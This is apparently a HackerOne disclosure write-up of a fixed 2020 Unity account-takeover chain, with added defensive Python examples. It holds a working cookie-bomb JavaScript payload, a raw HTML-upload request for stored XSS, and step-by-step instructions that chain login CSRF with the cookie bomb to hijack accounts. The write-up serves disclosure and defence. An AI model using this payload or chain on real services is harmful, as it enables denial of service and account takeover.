Company Information:
Unity Software Inc. is an American video game software development company based in San Francisco. It was founded in Denmark in 2004 as Over the Edge Entertainment and changed its name in 2007.
Bug Category:
1. Cookie Bomb:
A cookie bomb is the ability to set a large number of oversized cookies for a domain and its subdomains, so that the victim's browser always sends such large HTTP requests to the server (because of the cookies) that the server refuses them. The result is a DoS against that user on the domain and its subdomains.
For more information, see the filedescriptor presentation linked in section 3 below.
2. Stored Cross-Site Scripting (XSS):
Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious link to a user and enticing the user to click it.
Target Information:
https://unity.com
Technical Details of the Bug:
I found multiple vulnerabilities in Unity, and chaining them together leads to account takeover. I will first describe each vulnerability separately and then combine them into a full account takeover.
1. Login CSRF on the Main Login Endpoint:
There is no validation of the Conversation ID, and Conversation IDs are not associated with the user's browser session. This leads to Login CSRF.
All login authentication happens on Unity services such as id.unity.com and connect.unity.com, through the API endpoint and the id.unity.com endpoint.
Every login flow starts with the URL below. https://id.unity.com/en/conversations/[conversations_id]
In my understanding, many requests are exchanged between api.unity.com and id.unity.com, and all the user details (password, social login tokens) are saved against this conversation_ID. Once the conversation_ID holds either a password or a social token, the final GET request for the conversation_ID takes place, which is the request that actually logs into the account.
If the attacker completes the whole flow and delivers the final request to the victim, the victim will be logged in as the attacker. This is what makes the full account takeover possible.
Let me know if you don't understand this part specifically.
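The root cause of this finding is that the conversation is looked up by its ID alone. The following is an added example (not Unity's code) of what binding a login conversation to the browser session that created it looks like on the server side, with a vulnerable lookup next to the fixed one; the store layout, method names and session ids are hypothetical.

```python
# Added example, not Unity's code: a login "conversation" has to be bound to the
# browser session that created it at every step. Store layout and names are hypothetical.
import hmac
import secrets

class ConversationStore:
    def __init__(self):
        self._conv = {}

    def start(self, session_id):
        # Remember which browser session (its session cookie) created the conversation.
        cid = secrets.token_urlsafe(24)
        self._conv[cid] = {"session_id": session_id, "identity": None}
        return cid

    def attach_identity_vulnerable(self, cid, identity):
        # Whoever arrives carrying cid (e.g. as the OAuth 'state') loads a token into it.
        self._conv[cid]["identity"] = identity

    def finalize_vulnerable(self, cid):
        # Lookup by cid alone: anyone who knows cid is logged in as the stored identity.
        conv = self._conv.get(cid)
        return conv["identity"] if conv else None

    def _owned_by(self, cid, session_id):
        conv = self._conv.get(cid)
        return conv is not None and hmac.compare_digest(conv["session_id"], session_id)

    def attach_identity_fixed(self, cid, session_id, identity):
        # Password step or IdP callback: refuse if the cid belongs to another session.
        if not self._owned_by(cid, session_id):
            return False
        self._conv[cid]["identity"] = identity
        return True

    def finalize_fixed(self, cid, session_id):
        # Only the owning session may finish the conversation, and only once.
        if not self._owned_by(cid, session_id):
            return None
        return self._conv.pop(cid)["identity"]

def demo():
    """Replays the cross-session moves from the report with constructed session ids."""
    s = ConversationStore()
    cid = s.start("attacker-browser")
    s.attach_identity_vulnerable(cid, "victim@example.test")   # victim's token lands in it
    vuln_final = s.finalize_vulnerable(cid)                    # attacker finishes as victim
    cid2 = s.start("attacker-browser")
    fixed_attach = s.attach_identity_fixed(cid2, "victim-browser", "victim@example.test")
    fixed_final = s.finalize_fixed(cid2, "attacker-browser")   # nothing was attached
    return vuln_final, fixed_attach, fixed_final
```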
2. Stored XSS in Connect Project Attachment: Stored XSS in Connect -> Project -> Attachment Upload
In Connect -> Project -> Add Attachment in content.
This file upload is vulnerable to a stored XSS attack that executes on https://connect-prd-cdn.unity.com. Vulnerable HTTP request:
POST /api/p/0/attachments HTTP/1.1
Host: connect.unity.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://connect.unity.com/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3022861621989559703734437534
Content-Length: 1961
Origin: https://connect.unity.com
Connection: close
Cookie: [Cookies]

-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="projectId"

-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="offset"

0
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="startBlock"

1
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="uploadId"


-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="key"


-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="fileName"

PDF_with_JS_content.pdf
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="fileType"

application/pdf
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="size"

655
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="fromWeb"

true
-----------------------------3022861621989559703734437534
Content-Disposition: form-data; name="file"; filename="test.html"
Content-Type: text/html

content
-----------------------------3022861621989559703734437534--
Upload HTML content and the XSS will execute.
Let me know if you have issues with this part.
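Note that the request above declares fileName=PDF_with_JS_content.pdf and fileType=application/pdf while the file part itself is named test.html with Content-Type: text/html, and the server trusts the part. As an added example (not Unity's code), this is the kind of consistency and content check an attachment endpoint should apply before storing the file, together with the headers to serve it with so the CDN origin never renders an upload inline; the allow-list and function names are hypothetical.

```python
# Added example, not Unity's code: checks an attachment endpoint should apply to a part
# like the one above before storing it, and the headers to serve it with afterwards.
# The allow-list and the function names are hypothetical.
import os

# Extension -> (content type the server will serve, magic-byte prefixes). Nothing else passes.
ALLOWED = {
    ".pdf": ("application/pdf", (b"%PDF-",)),
    ".png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ".jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

def validate_attachment(declared_name, declared_type, part_filename, part_type, data):
    """Return (ok, reason). Every client-supplied field has to agree with the bytes."""
    ext = os.path.splitext(declared_name.lower())[1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    served_type, magics = ALLOWED[ext]
    # The request above declares fileName=*.pdf / fileType=application/pdf but ships a
    # part named test.html with Content-Type: text/html; any such disagreement is a reject.
    if os.path.splitext(part_filename.lower())[1] != ext:
        return False, "part filename extension differs from fileName"
    if declared_type != served_type or part_type != served_type:
        return False, "content type mismatch"
    # Client-supplied types are hints only; sniff the bytes themselves.
    if not any(data.startswith(m) for m in magics):
        return False, "content does not match declared format"
    return True, "ok"

def download_headers(declared_name):
    """Headers for serving a stored attachment (one that passed validate_attachment)."""
    ext = os.path.splitext(declared_name.lower())[1]
    return {
        "Content-Type": ALLOWED[ext][0],       # from the allow-list, not from the upload
        "Content-Disposition": 'attachment; filename="%s"' % os.path.basename(declared_name),
        "X-Content-Type-Options": "nosniff",   # browser must not sniff it into text/html
        "Content-Security-Policy": "sandbox",  # scripts stay inert even if rendered
    }
```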
3. Cookie Bomb to Deface All Unity Services:
If you don't know about cookie bombs, I'd recommend reading the basics in the talk by filedescriptor below. Link: https://speakerdeck.com/filedescriptor/the-cookie-monster-in-your-browsers?slide=38
From a subdomain you can set cookies for the other subdomains through JavaScript (by scoping them to the parent domain). If you inject more than 8k of cookies for a domain, the server will not be able to handle the request and returns a 400 Bad Request error. Adding the JS code below will deface all the Unity websites.
Code:
<html>
<head>
</head>
<body>
<script>
  var base_domain = document.domain.substr(document.domain.indexOf('.'));
  var pollution = Array(4000).join('a');
  for (var i = 1; i < 6; i++) {
    document.cookie = 'bomb' + i + '=' + pollution + ';Domain=.unity.com;path=/';
  }
</script>
<h1>Cookie Bomb executed! To remove it clear your cookies.</h1>
</body>
</html>
Upload this code through the file upload with an HTML extension and open it. Once it runs, all your Unity services will show "400 server couldn't fulfil your request". It defaces the services below.
1. api.unity.com
2. connect.unity.com
3. id.unity.com
4. assetstore, forum, answers etc.
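Because the cookies are scoped to .unity.com, no single service can remove them by itself and the user stays stuck with 400s. As an added example (not Unity's code), the following edge-side check answers an oversized Cookie header with 431 and a Clear-Site-Data header, which clears cookies for the whole registrable domain and lets the browser recover; it assumes the proxy in front still forwards the request, and the limit and function names are hypothetical.

```python
# Added example, not Unity's code: an edge-side check that turns an oversized Cookie
# header into a recovery response instead of a persistent 400. Assumes the proxy in front
# still forwards the request; the limit and the function names are hypothetical.
COOKIE_LIMIT = 8192  # bytes; the report sees requests fail once cookies pass roughly 8k

def cookie_header_size(cookie_header):
    """Size of the Cookie header as the server receives it."""
    return len(cookie_header.encode("utf-8", "surrogateescape"))

def handle_cookie_header(cookie_header):
    """Return (status, headers) for the request's Cookie header."""
    if cookie_header_size(cookie_header) > COOKIE_LIMIT:
        return 431, {
            # Clear-Site-Data removes cookies for the whole registrable domain, including
            # ones planted by a sibling subdomain with Domain=.unity.com, so the victim's
            # browser recovers on the next request. It also drops the session cookie,
            # which is a logout rather than a permanent lockout.
            "Clear-Site-Data": '"cookies"',
            "Cache-Control": "no-store",
        }
    return 200, {}

def build_bomb_header(count=5, size=3999):
    """Constructed Cookie header shaped like the script above: bomb1..bomb5, 3999 bytes each."""
    return "; ".join("bomb%d=%s" % (i, "a" * size) for i in range(1, count + 1))
```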
Combining All Together:
1. The attacker goes to the login page and generates a new Conversation_ID.
Ex: https://id.unity.com/en/conversations/[conversation_ID]
2. Select the social login and drop the next social login request.
3. Now, using the stored XSS on Connect, the attacker writes a cookie bomb script for the specific path "en/conversations/" (combining vulnerabilities 2 and 3). This defaces the victim's Unity services for the "en/conversations/" path, so the victim can't access the https://id.unity.com/en/conversations/[conversation_ID] URL.
4. Now send the social login request to the victim: during processing the victim's token is added to the conversation_ID, but the final URL that activates the login (https://id.unity.com/en/conversations/[conversation_ID]) won't work because of the cookie bomb.
5. Since the attacker knows the conversation_ID, the attacker opens the final URL and is logged into the victim's account.
Link: https://id.unity.com/en/conversations/[conversation_ID]
6. Once the attacker is logged in, they have access to all the services/logins, including all Unity and Unity3d services, since all of them are connected through api.unity.com and the attacker controls it.
I am able to take over the account through the normal (password) login as well, but that requires user interaction: the user has to enter their password. Let me know if you need the PoC for that.
Steps To Reproduce:
I'll use one victim account and one attacker account as the example. Take a Facebook-connected victim account; I'm using Facebook as the social login. Also prepare the cookie bomb script from step 3, hosted on https://connect-prd-cdn.unity.com.
1. From the attacker account go to https://id.unity.com/ and you will be redirected to the conversation_ID link.
Link: https://id.unity.com/en/conversations/[conversation_ID]
2. Click on Facebook as the login and intercept the request.
3. The request after that will be the Facebook OAuth request. Capture it and drop it. It will look like the following: https://www.facebook.com/v2.8/dialog/oauth?client_id=1450072528416285&redirect_uri=https://api.unity.com/v1/oauth2/authorize/facebook&response_type=code&scope=email,public_profile&display=page&state=[conversation_ID]
4. Now first open the https://connect-prd-cdn.unity.com URL of the cookie bomb, then open the above Facebook login in the victim's browser/account.
(Steps 3 and 4 can be written in the same code.)
5. Now open the first URL with the conversation_ID again and you will be logged into the victim's account.
Video POC:
Impact:
This is Unity's main login. All Unity services are connected to it through OAuth. If an attacker has access to it, they can access all Unity and Unity3d services.
Timeline:
April 08th 2020: Report sent to the Unity Product Security Team through HackerOne.
April 21st 2020: Report accepted and triaged.
April 21st 2020: Issue completely resolved and confirmed.
June 04th 2020: $3000 bounty rewarded.